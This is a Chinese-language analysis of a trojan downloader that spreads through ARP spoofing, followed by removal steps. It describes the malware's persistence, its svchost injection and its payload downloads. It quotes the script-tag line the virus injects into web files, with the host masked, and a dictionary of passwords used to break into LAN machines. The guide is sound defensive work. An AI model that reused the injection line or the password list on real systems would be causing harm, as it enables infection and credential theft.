|
最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状 这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件,如图.  其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息
病毒运行后: 1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe %systemroot%\system32\config\AppEventw.cfg %systemroot%\system32\drivers\pcibus.sys
2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加 <comrepl32><%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的 3.启动一个svchost.exe进程,将自身代码注入到该svchost.exe进程中,并通过svchost.exe进程下载 http://*/elf_listo.txt到system32\taimpo.txt并读取里面的内容(里面一般为要下载的病毒文件列表),之后下载http://*/*1.exe~http://*/*21.exe到C:\并命名为conime.exe~conime0.exe
4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件,在其后面添加<script language=javascript src=http://*/abc.js></script>的代码
5.试图以下列密码连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包。(但未证实)
901100 mypass123 mypass admin123 mypc123 mypc love pw123 Login login owner home zxcv yxcv qwer asdf temp123 temp test123 test fuck fuckyou root ator administrator patrick 123abc 1234qwer 123123 121212 111111 alpha 2600 2003 2002 enable godblessyou ihavenopass 123asd super computer server 123qwe sybase abc123 abcd database passwd pass 88888888 11111111 000000 54321 654321 123456789 1234567 qq520 5201314 admin 12345 12345678 mein letmein 2112 baseball qwerty 7777 5150 fish 1313 shadow 1111 mustang pussy golf 123456 harley 6969 password 1234 当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况,上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者.
上述病毒木马植入完毕后,中毒机器的sreng日志如下:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <upxdnd><%systemroot%\upxdnd.exe> [] <WinForm><%systemroot%\WinForm.exe> [] <MsIMMs32><%systemroot%\MsIMMs32.exe> [] <GenProtect><%systemroot%\GenProtect.exe> [] <cmdbcs><%systemroot%\cmdbcs.exe> [] <AVPSrv><%systemroot%\AVPSrv.exe> [] <NVDispDrv><%systemroot%\NVDispDrv.exe> [] <WinSysW><%systemroot%\swchost.exe> [] <KVP><%systemroot%\system32\drivers\svchost.exe> [] <Kvsc3><%systemroot%\Kvsc3.exe> [] <WinSysM><%systemroot%\IGM.exe> [] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] <comrepl32><%systemroot%\system32\com\comrepl32.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] <{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation] <{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> [] <{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> [] ================================== 正在运行的进程 [PID: 1684][%systemroot%\Explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)] [%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys] [N/A, ] [%systemroot%\system32\zhjtrx.dll] [N/A, ] [%systemroot%\system32\upxdnd.dll] [N/A, ] [%systemroot%\system32\AVPSrv.dll] [N/A, ] [%systemroot%\system32\MsIMMs32.dll] [N/A, ] [%systemroot%\system32\WinForm.dll] [N/A, ] [%systemroot%\system32\Kvsc3.dll] [N/A, ] [%systemroot%\system32\cmdbcs.dll] [N/A, ] [%systemroot%\system32\NVDispDrv.dll] [N/A, ] [%systemroot%\system32\GenProtect.dll] [N/A, ] [%systemroot%\system32\ikewriyriu.dll] [Microsoft Corporation, 5.1.2600.3099] ================================== Winsock 提供者 MSAPI Tcpip [TCP/IP] %systemroot%\system32\sqmapi32.dll(, N/A) MSAPI Tcpip [UDP/IP] %systemroot%\system32\sqmapi32.dll(, N/A) ......
清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行杀毒操作。
sreng(该软件下载地址:down.45it.com):
一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] <comrepl32><%systemroot%\system32\com\comrepl32.exe> [] 2.双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定,删除如下文件
%systemroot%\system32\com\comrepl32.exe %systemroot%\system32\config\AppEventw.cfg %systemroot%\system32\drivers\pcibus.sys
二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)
1.打开sreng
启动项目 注册表 删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <upxdnd><%systemroot%\upxdnd.exe> [] <WinForm><%systemroot%\WinForm.exe> [] <MsIMMs32><%systemroot%\MsIMMs32.exe> [] <GenProtect><%systemroot%\GenProtect.exe> [] <cmdbcs><%systemroot%\cmdbcs.exe> [] <AVPSrv><%systemroot%\AVPSrv.exe> [] <NVDispDrv><%systemroot%\NVDispDrv.exe> [] <WinSysW><%systemroot%\swchost.exe> [] <KVP><%systemroot%\system32\drivers\svchost.exe> [] <Kvsc3><%systemroot%\Kvsc3.exe> [] <WinSysM><%systemroot%\IGM.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks] <{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation] <{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> [] <{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> [] 系统修复 高级修复里面 选择重置winsock 重启计算机,重启后双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
删除如下文件 %Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys %Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao %Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp %systemroot%\system32\drivers\pcibus.sys %systemroot%\system32\drivers\svchost.exe %systemroot%\system32\AVPSrv.dll %systemroot%\system32\cmdbcs.dll %systemroot%\system32\djatl.dll %systemroot%\system32\GenProtect.dll %systemroot%\system32\gjatl.dll %systemroot%\system32\ikewriyriu.dll %systemroot%\system32\Kvsc3.dll %systemroot%\system32\MsIMMs32.dll %systemroot%\system32\msplay32.dll %systemroot%\system32\NVDispDrv.dll %systemroot%\system32\sqmapi32.dll %systemroot%\system32\upxdnd.dll %systemroot%\system32\WinForm.dll %systemroot%\system32\wlatl.dll %systemroot%\system32\zhjtrx.dll %systemroot%\system32\zxatl.dll %systemroot%\AVPSrv.exe %systemroot%\cmdbcs.exe %systemroot%\GenProtect.exe %systemroot%\IGM.exe %systemroot%\Kvsc3.exe %systemroot%\MsIMMs32.exe %systemroot%\NVDispDrv.exe %systemroot%\swchost.exe %systemroot%\upxdnd.exe %systemroot%\WinForm.exe %systemroot%\system32\sqmapi32.dll 2.修复被感染的html等网页文件
推荐使用CSI的iframkill
下载地址:http://www.vaid.cn/blog/read.php?9 3.建议广大网管屏蔽这个ip地址:60.190.101.206
|